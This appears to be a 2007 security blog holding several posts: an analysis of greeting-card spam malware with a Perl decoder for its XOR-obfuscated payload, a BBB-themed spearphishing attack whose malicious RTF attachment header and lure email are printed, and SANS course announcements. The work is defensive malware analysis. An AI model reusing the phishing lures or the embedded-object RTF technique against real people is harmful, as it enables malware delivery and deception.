Saturday, June 30, 2007

More greeting card spam

The greeting card spam wave continues. Subject lines vary somewhat; here's a sampling from today:
  • You've received a greeting card from a class-mate!
  • You've received a greeting card from a colleague!
  • You've received a greeting card from a family member!
  • You've received a greeting card from a friend!
  • You've received a greeting card from a neighbor!
  • You've received a greeting card from a school mate!
  • You've received a greeting ecard from a class-mate!
  • You've received a greeting ecard from a colleague!
  • You've received a greeting ecard from a family member!
  • You've received a greeting ecard from a friend!
  • You've received a greeting ecard from a neighbour!
  • You've received a greeting ecard from a partner!
  • You've received a greeting ecard from a worshipper!
  • You've received a greeting postcard from a colleague!
  • You've received a greeting postcard from a family member!
  • You've received a greeting postcard from a friend!
  • You've received a postcard from a class-mate!
  • You've received a postcard from a colleague!
  • You've received a postcard from a family member!
  • You've received a postcard from a partner!
  • You've received an ecard from a partner!
  • You've received an ecard from a worshipper!
They are now linking to IP addresses (as opposed to .hk sites in the early stages).

The Internet Storm Center has an excellent analysis.

Here's a sample 'index.html' file:


The hex code goes on for awhile:


The file is obfuscated with XORed hexadecimal. The key in this case is '227' (it changes with each copy, for a simple form of polymorphism). This perl snippet will decode the XORed hex:

perl -e 'while(<>){
s/\\x([a-f0-9]{2})/chr(227)^pack(C,hex($1))/eg;print;}'


If you are analyzing your own code, change the '227' in the perl code to match the key in the index.html file.

The de-obfuscated code looks like this:


Among other nastiness, it retrieves the file http://XX.252.250.104/file.php, which is really a Windows executable that BitDefender identifies as: "Generic.Malware.dld!!.2526793B"

Tuesday, June 26, 2007

HK greeting card malware

Beginning this morning we received a torrent of 'greeting card' malware, linking to domains in Hong Kong.

The excellent Chinese Internet Security Response Team has a blog entry on this attack.

Sites today include 'menot', 'notme,' and 'catcher,' all in the .HK tld.

The attack appears highly widespread. Avira detects EXP/iFrame.D.1 in the drive-by javascript included in the site's 'index.html' file, and TR/Small.DBY.DH in ecard.exe (helpfully offered if the drive-by exploit fails, with the text "the We are currently testing a new browser feature. If you are not able to view this ecard, please click here to view in its original format.)

The spams look like this:

---------------------------------------------------------------------
From: "*****.hk"
To:
Subject: You've received a postcard from a family member!
Date: Tue, 26 Jun 2007 19:19:33 -0500

Good day.

Your family member has sent you an ecard from ******.hk.

Send free ecards from ******.hk with your choice of colors, words and music.

Your ecard will be available with us for the next 30 days. If you wish to keep the ecard longer, you may save it on your computer or take a print.

To view your ecard, choose from any of the following options:

--------
OPTION 1
--------

Click on the following Internet address or
copy & paste it into your browser's address box.

http://******.hk/?XXXXXXXXXXXXXXXXXXXXXXX

--------
OPTION 2
--------

Copy & paste the ecard number in the "View Your Card" box at
http://*******.hk/

Your ecard number is
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Best wishes,
Postmaster,
*****.hk

*If you would like to send someone an ecard, you can do so at
http://*********.hk/

Thursday, June 21, 2007

'BBB.org' spearphishing attack

I've seen a number of fake 'BBB.org' emails, spammed to senior positions.

The Better Business Bureau's official site describes the attack.

I attached a cleaned-up copy below, with headers.

The emails contain an attachment, in these cases called 'Document_for_Case.doc'. It's an RTF (Rich Text Format) document that contains a malicious embedded object; here's the beginning of that file:

{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\f0\fs20 This document contains an embedded object. To open it double-click the icon.\par
\par
{\object\objemb{\*\objclass Package}\objw2325\objh765{\*\objdata
01050000
02000000
08000000
5061636b61676500
00000000
00000000
882e0000
0200446f63756d656e74735f666f725f436173652e70646600433a5c41444f4245527e312e4558


That document scans 'clean' by most virus scanners. On 6/21/2007 Virustotal.com reported that only 9 of their 30 scanners spot it.


This attack may be fairly damaging, given that weak antivirus coverage, the fact that it's a legitimate '.doc' file (typically allowed through internet mail relays, unlike exe's which are sometimes blocked), and due to the fact that it's targeted at a small number of senior users.

Here's the email, somewhat cleaned up. The original was in html format:

Received: from smtp.tele.fi (smtp.tele.fi [192.89.123.25])
by *****.*****.org (Postfix) with ESMTP id 0AAC85F13D4
for <*****@*****.org>; Thu, 21 Jun 2007 09:05:37 -0400 (EDT)
Received: from mailgw.benefon.fi (unknown [194.197.24.10])
by smtp.tele.fi (Postfix) with ESMTP id 38E97AE182
for <*****@****.org>; Thu, 21 Jun 2007 16:05:03 +0300 (EEST)
Received: from localhost.localdomain ([192.83.5.2])
by mailgw.benefon.fi (Lotus Domino Release 5.0.9)
with SMTP id 2007062116045807:59067 ;
Thu, 21 Jun 2007 16:04:58 +0300
From: Better Business Bureaus
Subject: Complaint Case Number 450596111
MIME-Version: 1.0
Date: Thu, 21 Jun 2007 16:04:58 +0300
Message-ID:
Content-Type: multipart/mixed; boundary=38ACD4BC0E5E9B20090A53C405940998
To: undisclosed-recipients:;

Dear Mr./Mrs. ***** *****

You have received a complaint in regards to your business services. The
complaint was filled by Mr. ***** ***** on 6/19/2007

Complaint Case Number: XXXXXXXXXX

Complaint Made by Consumer Mr. ***** *****

Complaint Registered Against: Company ********************

Date: 6/19/2007

Instructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email.

Disputes involving consumer products and/or services may be arbitrated.
Unless they directly relate to the contract that is the basis of this dispute
the following claims will be considered for arbitration only if all parties
agree in writing that the arbitrator may consider them:

- Claims based on product liability;
- Claims for personal injuries;
- Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties.

The decision as to whether your dispute or any part of it can be arbitrated rests solely with the BBB.

The BBB offers its members a binding arbitration service for disputes involving marketplace transactions.

Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options.

© 2003 Council of Better Business Bureaus, Inc. All Rights Reserved.

Tuesday, June 05, 2007

Upcoming conferences and SANS Monterey

I will teach SANS Management 414: SANS® +S™ Training Program for the CISSP® Certification Exam in St. Louis, beginning this Monday:

http://www.sans.org/stlouis07_cs/


Community SANS Portland Maine 2007 was just announced, beginning August 20th. It's Hacker Techniques (Security 504), in 'bootcamp' style. It's SAN's first conference in Maine.

http://www.sans.org/portland07_cs/

I just got back from beautiful Monterey, CA, where I taught Security Hacker Techniques (SEC 504):

http://www.sans.org/monterey07/event.php

I've been to other parts of California; Monterey is my favorite so far.